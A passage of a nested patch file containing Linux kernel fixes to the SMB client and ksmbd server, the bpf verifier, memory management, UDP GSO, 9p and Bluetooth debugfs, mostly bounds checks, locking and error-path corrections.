+@@ -538,13 +591,20 @@ void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
+ 	if (!tcon->need_reconnect && !cifs_file->invalidHandle) {
+ 		struct TCP_Server_Info *server = tcon->ses->server;
+ 		unsigned int xid;
++		int rc = 0;
+ 
+ 		xid = get_xid();
+ 		if (server->ops->close_getattr)
+-			server->ops->close_getattr(xid, tcon, cifs_file);
++			rc = server->ops->close_getattr(xid, tcon, cifs_file);
+ 		else if (server->ops->close)
+-			server->ops->close(xid, tcon, &cifs_file->fid);
++			rc = server->ops->close(xid, tcon, &cifs_file->fid);
+ 		_free_xid(xid);
++
++		if (rc == -EBUSY || rc == -EAGAIN) {
++			// Server close failed, hence offloading it as an async op
++			queue_work(serverclose_wq, &cifs_file->serverclose);
++			serverclose_offloaded = true;
++		}
+ 	}
+ 
+ 	if (oplock_break_cancelled)
+@@ -552,10 +612,15 @@ void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
+ 
+ 	cifs_del_pending_open(&open);
+ 
+-	if (offload)
+-		queue_work(fileinfo_put_wq, &cifs_file->put);
+-	else
+-		cifsFileInfo_put_final(cifs_file);
++	// if serverclose has been offloaded to wq (on failure), it will
++	// handle offloading put as well. If serverclose not offloaded,
++	// we need to handle offloading put here.
++	if (!serverclose_offloaded) {
++		if (offload)
++			queue_work(fileinfo_put_wq, &cifs_file->put);
++		else
++			cifsFileInfo_put_final(cifs_file);
++	}
+ }
+ 
+ int cifs_open(struct inode *inode, struct file *file)
+@@ -705,11 +770,11 @@ int cifs_open(struct inode *inode, struct file *file)
+ use_cache:
+ 	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
+ 			   file->f_mode & FMODE_WRITE);
+-	if (file->f_flags & O_DIRECT &&
+-	    (!((file->f_flags & O_ACCMODE) != O_RDONLY) ||
+-	     file->f_flags & O_APPEND))
+-		cifs_invalidate_cache(file_inode(file),
+-				      FSCACHE_INVAL_DIO_WRITE);
++	if (!(file->f_flags & O_DIRECT))
++		goto out;
++	if ((file->f_flags & (O_ACCMODE | O_APPEND)) == O_RDONLY)
++		goto out;
++	cifs_invalidate_cache(file_inode(file), FSCACHE_INVAL_DIO_WRITE);
+ 
+ out:
+ 	free_dentry_path(page);
+@@ -774,6 +839,7 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	int disposition = FILE_OPEN;
+ 	int create_options = CREATE_NOT_DIR;
+ 	struct cifs_open_parms oparms;
++	int rdwr_for_fscache = 0;
+ 
+ 	xid = get_xid();
+ 	mutex_lock(&cfile->fh_mutex);
+@@ -837,7 +903,11 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	}
+ #endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+ 
+-	desired_access = cifs_convert_flags(cfile->f_flags);
++	/* If we're caching, we need to be able to fill in around partial writes. */
++	if (cifs_fscache_enabled(inode) && (cfile->f_flags & O_ACCMODE) == O_WRONLY)
++		rdwr_for_fscache = 1;
++
++	desired_access = cifs_convert_flags(cfile->f_flags, rdwr_for_fscache);
+ 
+ 	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
+ 	if (cfile->f_flags & O_SYNC)
+@@ -849,6 +919,7 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	if (server->ops->get_lease_key)
+ 		server->ops->get_lease_key(inode, &cfile->fid);
+ 
++retry_open:
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
+@@ -874,6 +945,11 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 		/* indicate that we need to relock the file */
+ 		oparms.reconnect = true;
+ 	}
++	if (rc == -EACCES && rdwr_for_fscache == 1) {
++		desired_access = cifs_convert_flags(cfile->f_flags, 0);
++		rdwr_for_fscache = 2;
++		goto retry_open;
++	}
+ 
+ 	if (rc) {
+ 		mutex_unlock(&cfile->fh_mutex);
+@@ -882,6 +958,9 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 		goto reopen_error_exit;
+ 	}
+ 
++	if (rdwr_for_fscache == 2)
++		cifs_invalidate_cache(inode, FSCACHE_INVAL_DIO_WRITE);
++
+ #ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+ reopen_success:
+ #endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+diff --git a/fs/smb/client/fscache.c b/fs/smb/client/fscache.c
+index f64bad513ba6d..6df4ab2a6e5dc 100644
+--- a/fs/smb/client/fscache.c
++++ b/fs/smb/client/fscache.c
+@@ -12,6 +12,16 @@
+ #include "cifs_fs_sb.h"
+ #include "cifsproto.h"
+ 
++/*
++ * Key for fscache inode.  [!] Contents must match comparisons in cifs_find_inode().
++ */
++struct cifs_fscache_inode_key {
++
++	__le64  uniqueid;	/* server inode number */
++	__le64  createtime;	/* creation time on server */
++	u8	type;		/* S_IFMT file type */
++} __packed;
++
+ static void cifs_fscache_fill_volume_coherency(
+ 	struct cifs_tcon *tcon,
+ 	struct cifs_fscache_volume_coherency_data *cd)
+@@ -97,15 +107,19 @@ void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon)
+ void cifs_fscache_get_inode_cookie(struct inode *inode)
+ {
+ 	struct cifs_fscache_inode_coherency_data cd;
++	struct cifs_fscache_inode_key key;
+ 	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+ 	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+ 	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+ 
++	key.uniqueid	= cpu_to_le64(cifsi->uniqueid);
++	key.createtime	= cpu_to_le64(cifsi->createtime);
++	key.type	= (inode->i_mode & S_IFMT) >> 12;
+ 	cifs_fscache_fill_coherency(&cifsi->netfs.inode, &cd);
+ 
+ 	cifsi->netfs.cache =
+ 		fscache_acquire_cookie(tcon->fscache, 0,
+-				       &cifsi->uniqueid, sizeof(cifsi->uniqueid),
++				       &key, sizeof(key),
+ 				       &cd, sizeof(cd),
+ 				       i_size_read(&cifsi->netfs.inode));
+ 	if (cifsi->netfs.cache)
+diff --git a/fs/smb/client/fscache.h b/fs/smb/client/fscache.h
+index 67b601041f0a3..c691b98b442a6 100644
+--- a/fs/smb/client/fscache.h
++++ b/fs/smb/client/fscache.h
+@@ -108,6 +108,11 @@ static inline void cifs_readpage_to_fscache(struct inode *inode,
+ 		__cifs_readpage_to_fscache(inode, page);
+ }
+ 
++static inline bool cifs_fscache_enabled(struct inode *inode)
++{
++	return fscache_cookie_enabled(cifs_inode_cookie(inode));
++}
++
+ #else /* CONFIG_CIFS_FSCACHE */
+ static inline
+ void cifs_fscache_fill_coherency(struct inode *inode,
+@@ -123,6 +128,7 @@ static inline void cifs_fscache_release_inode_cookie(struct inode *inode) {}
+ static inline void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update) {}
+ static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode) { return NULL; }
+ static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags) {}
++static inline bool cifs_fscache_enabled(struct inode *inode) { return false; }
+ 
+ static inline int cifs_fscache_query_occupancy(struct inode *inode,
+ 					       pgoff_t first, unsigned int nr_pages,
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 5343898bac8a6..634f28f0d331e 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -1274,6 +1274,8 @@ cifs_find_inode(struct inode *inode, void *opaque)
+ {
+ 	struct cifs_fattr *fattr = opaque;
+ 
++	/* [!] The compared values must be the same in struct cifs_fscache_inode_key. */
++
+ 	/* don't match inode with different uniqueid */
+ 	if (CIFS_I(inode)->uniqueid != fattr->cf_uniqueid)
+ 		return 0;
+diff --git a/fs/smb/client/misc.c b/fs/smb/client/misc.c
+index 41290c12d0bcc..3826f71766086 100644
+--- a/fs/smb/client/misc.c
++++ b/fs/smb/client/misc.c
+@@ -476,6 +476,8 @@ is_valid_oplock_break(char *buffer, struct TCP_Server_Info *srv)
+ 	/* look up tcon based on tid & uid */
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			if (tcon->tid != buf->Tid)
+ 				continue;
+diff --git a/fs/smb/client/smb1ops.c b/fs/smb/client/smb1ops.c
+index 7d1b3fc014d94..d4045925f8577 100644
+--- a/fs/smb/client/smb1ops.c
++++ b/fs/smb/client/smb1ops.c
+@@ -750,11 +750,11 @@ cifs_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
+ 	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
+ }
+ 
+-static void
++static int
+ cifs_close_file(const unsigned int xid, struct cifs_tcon *tcon,
+ 		struct cifs_fid *fid)
+ {
+-	CIFSSMBClose(xid, tcon, fid->netfid);
++	return CIFSSMBClose(xid, tcon, fid->netfid);
+ }
+ 
+ static int
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index 15fa022e79993..8c149cb531d3f 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -622,6 +622,8 @@ smb2_is_valid_lease_break(char *buffer, struct TCP_Server_Info *server)
+ 	/* look up tcon based on tid & uid */
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			spin_lock(&tcon->open_file_lock);
+ 			cifs_stats_inc(
+@@ -697,6 +699,8 @@ smb2_is_valid_oplock_break(char *buffer, struct TCP_Server_Info *server)
+ 	/* look up tcon based on tid & uid */
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 
+ 			spin_lock(&tcon->open_file_lock);
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 34d1262004dfb..2291081653a85 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -1392,14 +1392,14 @@ smb2_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
+ 	memcpy(cfile->fid.create_guid, fid->create_guid, 16);
+ }
+ 
+-static void
++static int
+ smb2_close_file(const unsigned int xid, struct cifs_tcon *tcon,
+ 		struct cifs_fid *fid)
+ {
+-	SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++	return SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+ }
+ 
+-static void
++static int
+ smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
+ 		   struct cifsFileInfo *cfile)
+ {
+@@ -1410,7 +1410,7 @@ smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rc = __SMB2_close(xid, tcon, cfile->fid.persistent_fid,
+ 		   cfile->fid.volatile_fid, &file_inf);
+ 	if (rc)
+-		return;
++		return rc;
+ 
+ 	inode = d_inode(cfile->dentry);
+ 
+@@ -1436,6 +1436,7 @@ smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	/* End of file and Attributes should not have to be updated on close */
+ 	spin_unlock(&inode->i_lock);
++	return rc;
+ }
+ 
+ static int
+@@ -2436,6 +2437,8 @@ smb2_is_network_name_deleted(char *buf, struct TCP_Server_Info *server)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			if (tcon->tid == le32_to_cpu(shdr->Id.SyncId.TreeId)) {
+ 				spin_lock(&tcon->tc_lock);
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 4c1231496a725..cc425a616899a 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -3452,9 +3452,9 @@ __SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+ 			memcpy(&pbuf->network_open_info,
+ 			       &rsp->network_open_info,
+ 			       sizeof(pbuf->network_open_info));
++		atomic_dec(&tcon->num_remote_opens);
+ 	}
+ 
+-	atomic_dec(&tcon->num_remote_opens);
+ close_exit:
+ 	SMB2_close_free(&rqst);
+ 	free_rsp_buf(resp_buftype, rsp);
+diff --git a/fs/smb/server/ksmbd_netlink.h b/fs/smb/server/ksmbd_netlink.h
+index 0ebf91ffa2361..4464a62228cf3 100644
+--- a/fs/smb/server/ksmbd_netlink.h
++++ b/fs/smb/server/ksmbd_netlink.h
+@@ -166,7 +166,8 @@ struct ksmbd_share_config_response {
+ 	__u16	force_uid;
+ 	__u16	force_gid;
+ 	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME];
+-	__u32	reserved[112];		/* Reserved room */
++	__u32	reserved[111];		/* Reserved room */
++	__u32	payload_sz;
+ 	__u32	veto_list_sz;
+ 	__s8	____payload[];
+ };
+diff --git a/fs/smb/server/mgmt/share_config.c b/fs/smb/server/mgmt/share_config.c
+index 328a412259dc1..a2f0a2edceb8a 100644
+--- a/fs/smb/server/mgmt/share_config.c
++++ b/fs/smb/server/mgmt/share_config.c
+@@ -158,7 +158,12 @@ static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+ 	share->name = kstrdup(name, GFP_KERNEL);
+ 
+ 	if (!test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
+-		share->path = kstrdup(ksmbd_share_config_path(resp),
++		int path_len = PATH_MAX;
++
++		if (resp->payload_sz)
++			path_len = resp->payload_sz - resp->veto_list_sz;
++
++		share->path = kstrndup(ksmbd_share_config_path(resp), path_len,
+ 				      GFP_KERNEL);
+ 		if (share->path)
+ 			share->path_sz = strlen(share->path);
+diff --git a/fs/smb/server/smb2ops.c b/fs/smb/server/smb2ops.c
+index 27a9dce3e03ab..8600f32c981a1 100644
+--- a/fs/smb/server/smb2ops.c
++++ b/fs/smb/server/smb2ops.c
+@@ -228,6 +228,11 @@ void init_smb3_0_server(struct ksmbd_conn *conn)
+ 	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+ 
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION ||
++	    (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF) &&
++	     conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION))
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
++
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+ }
+@@ -275,11 +280,6 @@ int init_smb3_11_server(struct ksmbd_conn *conn)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING |
+ 			SMB2_GLOBAL_CAP_DIRECTORY_LEASING;
+ 
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION ||
+-	    (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF) &&
+-	     conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION))
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+-
+ 	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+ 		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 39fc078284c8e..c02b1772cb807 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -5579,8 +5579,9 @@ static int smb2_rename(struct ksmbd_work *work,
+ 	if (!file_info->ReplaceIfExists)
+ 		flags = RENAME_NOREPLACE;
+ 
+-	smb_break_all_levII_oplock(work, fp, 0);
+ 	rc = ksmbd_vfs_rename(work, &fp->filp->f_path, new_name, flags);
++	if (!rc)
++		smb_break_all_levII_oplock(work, fp, 0);
+ out:
+ 	kfree(new_name);
+ 	return rc;
+diff --git a/fs/smb/server/transport_ipc.c b/fs/smb/server/transport_ipc.c
+index f29bb03f0dc47..8752ac82c557b 100644
+--- a/fs/smb/server/transport_ipc.c
++++ b/fs/smb/server/transport_ipc.c
+@@ -65,6 +65,7 @@ struct ipc_msg_table_entry {
+ 	struct hlist_node	ipc_table_hlist;
+ 
+ 	void			*response;
++	unsigned int		msg_sz;
+ };
+ 
+ static struct delayed_work ipc_timer_work;
+@@ -275,6 +276,7 @@ static int handle_response(int type, void *payload, size_t sz)
+ 		}
+ 
+ 		memcpy(entry->response, payload, sz);
++		entry->msg_sz = sz;
+ 		wake_up_interruptible(&entry->wait);
+ 		ret = 0;
+ 		break;
+@@ -453,6 +455,34 @@ static int ipc_msg_send(struct ksmbd_ipc_msg *msg)
+ 	return ret;
+ }
+ 
++static int ipc_validate_msg(struct ipc_msg_table_entry *entry)
++{
++	unsigned int msg_sz = entry->msg_sz;
++
++	if (entry->type == KSMBD_EVENT_RPC_REQUEST) {
++		struct ksmbd_rpc_command *resp = entry->response;
++
++		msg_sz = sizeof(struct ksmbd_rpc_command) + resp->payload_sz;
++	} else if (entry->type == KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST) {
++		struct ksmbd_spnego_authen_response *resp = entry->response;
++
++		msg_sz = sizeof(struct ksmbd_spnego_authen_response) +
++				resp->session_key_len + resp->spnego_blob_len;
++	} else if (entry->type == KSMBD_EVENT_SHARE_CONFIG_REQUEST) {
++		struct ksmbd_share_config_response *resp = entry->response;
++
++		if (resp->payload_sz) {
++			if (resp->payload_sz < resp->veto_list_sz)
++				return -EINVAL;
++
++			msg_sz = sizeof(struct ksmbd_share_config_response) +
++					resp->payload_sz;
++		}
++	}
++
++	return entry->msg_sz != msg_sz ? -EINVAL : 0;
++}
++
+ static void *ipc_msg_send_request(struct ksmbd_ipc_msg *msg, unsigned int handle)
+ {
+ 	struct ipc_msg_table_entry entry;
+@@ -477,6 +507,13 @@ static void *ipc_msg_send_request(struct ksmbd_ipc_msg *msg, unsigned int handle
+ 	ret = wait_event_interruptible_timeout(entry.wait,
+ 					       entry.response != NULL,
+ 					       IPC_WAIT_TIMEOUT);
++	if (entry.response) {
++		ret = ipc_validate_msg(&entry);
++		if (ret) {
++			kvfree(entry.response);
++			entry.response = NULL;
++		}
++	}
+ out:
+ 	down_write(&ipc_msg_table_lock);
+ 	hash_del(&entry.ipc_table_hlist);
+diff --git a/fs/vboxsf/super.c b/fs/vboxsf/super.c
+index d2f6df69f6110..74952e58cca06 100644
+--- a/fs/vboxsf/super.c
++++ b/fs/vboxsf/super.c
+@@ -151,7 +151,7 @@ static int vboxsf_fill_super(struct super_block *sb, struct fs_context *fc)
+ 		if (!sbi->nls) {
+ 			vbg_err("vboxsf: Count not load '%s' nls\n", nls_name);
+ 			err = -EINVAL;
+-			goto fail_free;
++			goto fail_destroy_idr;
+ 		}
+ 	}
+ 
+@@ -224,6 +224,7 @@ static int vboxsf_fill_super(struct super_block *sb, struct fs_context *fc)
+ 		ida_simple_remove(&vboxsf_bdi_ida, sbi->bdi_id);
+ 	if (sbi->nls)
+ 		unload_nls(sbi->nls);
++fail_destroy_idr:
+ 	idr_destroy(&sbi->ino_idr);
+ 	kfree(sbi);
+ 	return err;
+diff --git a/include/kvm/arm_pmu.h b/include/kvm/arm_pmu.h
+index 96b192139a23a..6196b71c5eb58 100644
+--- a/include/kvm/arm_pmu.h
++++ b/include/kvm/arm_pmu.h
+@@ -85,7 +85,7 @@ void kvm_vcpu_pmu_restore_host(struct kvm_vcpu *vcpu);
+  */
+ #define kvm_pmu_update_vcpu_events(vcpu)				\
+ 	do {								\
+-		if (!has_vhe() && kvm_vcpu_has_pmu(vcpu))		\
++		if (!has_vhe() && kvm_arm_support_pmu_v3())		\
+ 			vcpu->arch.pmu.events = *kvm_get_pmu_events();	\
+ 	} while (0)
+ 
+diff --git a/include/linux/device.h b/include/linux/device.h
+index 5520bb546a4ac..f88b498ee9da4 100644
+--- a/include/linux/device.h
++++ b/include/linux/device.h
+@@ -1099,6 +1099,7 @@ void device_link_del(struct device_link *link);
+ void device_link_remove(void *consumer, struct device *supplier);
+ void device_links_supplier_sync_state_pause(void);
+ void device_links_supplier_sync_state_resume(void);
++void device_link_wait_removal(void);
+ 
+ extern __printf(3, 4)
+ int dev_err_probe(const struct device *dev, int err, const char *fmt, ...);
+diff --git a/include/linux/secretmem.h b/include/linux/secretmem.h
+index 988528b5da438..48ffe325184c0 100644
+--- a/include/linux/secretmem.h
++++ b/include/linux/secretmem.h
+@@ -14,10 +14,10 @@ static inline bool page_is_secretmem(struct page *page)
+ 	 * Using page_mapping() is quite slow because of the actual call
+ 	 * instruction and repeated compound_head(page) inside the
+ 	 * page_mapping() function.
+-	 * We know that secretmem pages are not compound and LRU so we can
++	 * We know that secretmem pages are not compound, so we can
+ 	 * save a couple of cycles here.
+ 	 */
+-	if (PageCompound(page) || !PageLRU(page))
++	if (PageCompound(page))
+ 		return false;
+ 
+ 	mapping = (struct address_space *)
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index c30d419ebf545..c4a8520dc748f 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -745,8 +745,6 @@ typedef unsigned char *sk_buff_data_t;
+  *	@list: queue head
+  *	@ll_node: anchor in an llist (eg socket defer_list)
+  *	@sk: Socket we are owned by
+- *	@ip_defrag_offset: (aka @sk) alternate use of @sk, used in
+- *		fragmentation management
+  *	@dev: Device we arrived on/are leaving by
+  *	@dev_scratch: (aka @dev) alternate use of @dev when @dev would be %NULL
+  *	@cb: Control buffer. Free for use by every layer. Put private vars here
+@@ -870,10 +868,7 @@ struct sk_buff {
+ 		struct llist_node	ll_node;
+ 	};
+ 
+-	union {
+-		struct sock		*sk;
+-		int			ip_defrag_offset;
+-	};
++	struct sock		*sk;
+ 
+ 	union {
+ 		ktime_t		tstamp;
+diff --git a/include/linux/udp.h b/include/linux/udp.h
+index efd9ab6df3797..79a4eae6f1f8f 100644
+--- a/include/linux/udp.h
++++ b/include/linux/udp.h
+@@ -140,6 +140,24 @@ static inline void udp_cmsg_recv(struct msghdr *msg, struct sock *sk,
+ 	}
+ }
+ 
++DECLARE_STATIC_KEY_FALSE(udp_encap_needed_key);
++#if IS_ENABLED(CONFIG_IPV6)
++DECLARE_STATIC_KEY_FALSE(udpv6_encap_needed_key);
++#endif
++
++static inline bool udp_encap_needed(void)
++{
++	if (static_branch_unlikely(&udp_encap_needed_key))
++		return true;
++
++#if IS_ENABLED(CONFIG_IPV6)
++	if (static_branch_unlikely(&udpv6_encap_needed_key))
++		return true;
++#endif
++
++	return false;
++}
++
+ static inline bool udp_unexpected_gso(struct sock *sk, struct sk_buff *skb)
+ {
+ 	if (!skb_is_gso(skb))
+@@ -153,6 +171,16 @@ static inline bool udp_unexpected_gso(struct sock *sk, struct sk_buff *skb)
+ 	    !udp_test_bit(ACCEPT_FRAGLIST, sk))
+ 		return true;
+ 
++	/* GSO packets lacking the SKB_GSO_UDP_TUNNEL/_CSUM bits might still
++	 * land in a tunnel as the socket check in udp_gro_receive cannot be
++	 * foolproof.
++	 */
++	if (udp_encap_needed() &&
++	    READ_ONCE(udp_sk(sk)->encap_rcv) &&
++	    !(skb_shinfo(skb)->gso_type &
++	      (SKB_GSO_UDP_TUNNEL | SKB_GSO_UDP_TUNNEL_CSUM)))
++		return true;
++
+ 	return false;
+ }
+ 
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index c69e09909449f..09bc4bf805c62 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -175,6 +175,15 @@ enum {
+ 	 */
+ 	HCI_QUIRK_USE_BDADDR_PROPERTY,
+ 
++	/* When this quirk is set, the Bluetooth Device Address provided by
++	 * the 'local-bd-address' fwnode property is incorrectly specified in
++	 * big-endian order.
++	 *
++	 * This quirk can be set before hci_register_dev is called or
++	 * during the hdev->setup vendor callback.
++	 */
++	HCI_QUIRK_BDADDR_PROPERTY_BROKEN,
++
+ 	/* When this quirk is set, the duplicate filtering during
+ 	 * scanning is based on Bluetooth devices addresses. To allow
+ 	 * RSSI based updates, restart scanning if needed.
+diff --git a/include/net/inet_connection_sock.h b/include/net/inet_connection_sock.h
+index 080968d6e6c53..8132f330306db 100644
+--- a/include/net/inet_connection_sock.h
++++ b/include/net/inet_connection_sock.h
+@@ -172,6 +172,7 @@ void inet_csk_init_xmit_timers(struct sock *sk,
+ 			       void (*delack_handler)(struct timer_list *),
+ 			       void (*keepalive_handler)(struct timer_list *));
+ void inet_csk_clear_xmit_timers(struct sock *sk);
++void inet_csk_clear_xmit_timers_sync(struct sock *sk);
+ 
+ static inline void inet_csk_schedule_ack(struct sock *sk)
+ {
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 579732d47dfc4..60577751ea9e8 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1833,6 +1833,13 @@ static inline void sock_owned_by_me(const struct sock *sk)
+ #endif
+ }
+ 
++static inline void sock_not_owned_by_me(const struct sock *sk)
++{
++#ifdef CONFIG_LOCKDEP
++	WARN_ON_ONCE(lockdep_sock_is_held(sk) && debug_locks);
++#endif
++}
++
+ static inline bool sock_owned_by_user(const struct sock *sk)
+ {
+ 	sock_owned_by_me(sk);
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 1a29ac4db6eae..27cc6e3db5a86 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -4965,6 +4965,11 @@ static int check_stack_access_within_bounds(
+ 	err = check_stack_slot_within_bounds(min_off, state, type);
+ 	if (!err && max_off > 0)
+ 		err = -EINVAL; /* out of stack access into non-negative offsets */
++	if (!err && access_size < 0)
++		/* access_size should not be negative (or overflow an int); others checks
++		 * along the way should have prevented such an access.
++		 */
++		err = -EFAULT; /* invalid negative access size; integer overflow? */
+ 
+ 	if (err) {
+ 		if (tnum_is_const(reg->var_off)) {
+diff --git a/mm/memory.c b/mm/memory.c
+index fb83cf56377ab..301c74c444385 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -5593,6 +5593,10 @@ int follow_phys(struct vm_area_struct *vma,
+ 		goto out;
+ 	pte = *ptep;
+ 
++	/* Never return PFNs of anon folios in COW mappings. */
++	if (vm_normal_folio(vma, address, pte))
++		goto unlock;
++
+ 	if ((flags & FOLL_WRITE) && !pte_write(pte))
+ 		goto unlock;
+ 
+diff --git a/net/9p/client.c b/net/9p/client.c
+index 84b93b04d0f06..1d9a8a1f3f107 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -1581,7 +1581,7 @@ p9_client_read_once(struct p9_fid *fid, u64 offset, struct iov_iter *to,
+ 		received = rsize;
+ 	}
+ 
+-	p9_debug(P9_DEBUG_9P, "<<< RREAD count %d\n", count);
++	p9_debug(P9_DEBUG_9P, "<<< RREAD count %d\n", received);
+ 
+ 	if (non_zc) {
+ 		int n = copy_to_iter(dataptr, received, to);
+@@ -1607,9 +1607,6 @@ p9_client_write(struct p9_fid *fid, u64 offset, struct iov_iter *from, int *err)
+ 	int total = 0;
+ 	*err = 0;
+ 
+-	p9_debug(P9_DEBUG_9P, ">>> TWRITE fid %d offset %llu count %zd\n",
+-		 fid->fid, offset, iov_iter_count(from));
+-
+ 	while (iov_iter_count(from)) {
+ 		int count = iov_iter_count(from);
+ 		int rsize = fid->iounit;
+@@ -1621,6 +1618,9 @@ p9_client_write(struct p9_fid *fid, u64 offset, struct iov_iter *from, int *err)
+ 		if (count < rsize)
+ 			rsize = count;
+ 
++		p9_debug(P9_DEBUG_9P, ">>> TWRITE fid %d offset %llu count %d (/%d)\n",
++			 fid->fid, offset, rsize, count);
++
+ 		/* Don't bother zerocopy for small IO (< 1024) */
+ 		if (clnt->trans_mod->zc_request && rsize > 1024) {
+ 			req = p9_client_zc_rpc(clnt, P9_TWRITE, NULL, from, 0,
+@@ -1648,7 +1648,7 @@ p9_client_write(struct p9_fid *fid, u64 offset, struct iov_iter *from, int *err)
+ 			written = rsize;
+ 		}
+ 
+-		p9_debug(P9_DEBUG_9P, "<<< RWRITE count %d\n", count);
++		p9_debug(P9_DEBUG_9P, "<<< RWRITE count %d\n", written);
+ 
+ 		p9_req_put(clnt, req);
+ 		iov_iter_revert(from, count - written - iov_iter_count(from));
+diff --git a/net/bluetooth/hci_debugfs.c b/net/bluetooth/hci_debugfs.c
+index 6124b3425f351..c9400a7d93d7b 100644
+--- a/net/bluetooth/hci_debugfs.c
++++ b/net/bluetooth/hci_debugfs.c
+@@ -217,10 +217,12 @@ static int conn_info_min_age_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val == 0 || val > hdev->conn_info_max_age)
++	hci_dev_lock(hdev);
++	if (val == 0 || val > hdev->conn_info_max_age) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->conn_info_min_age = val;
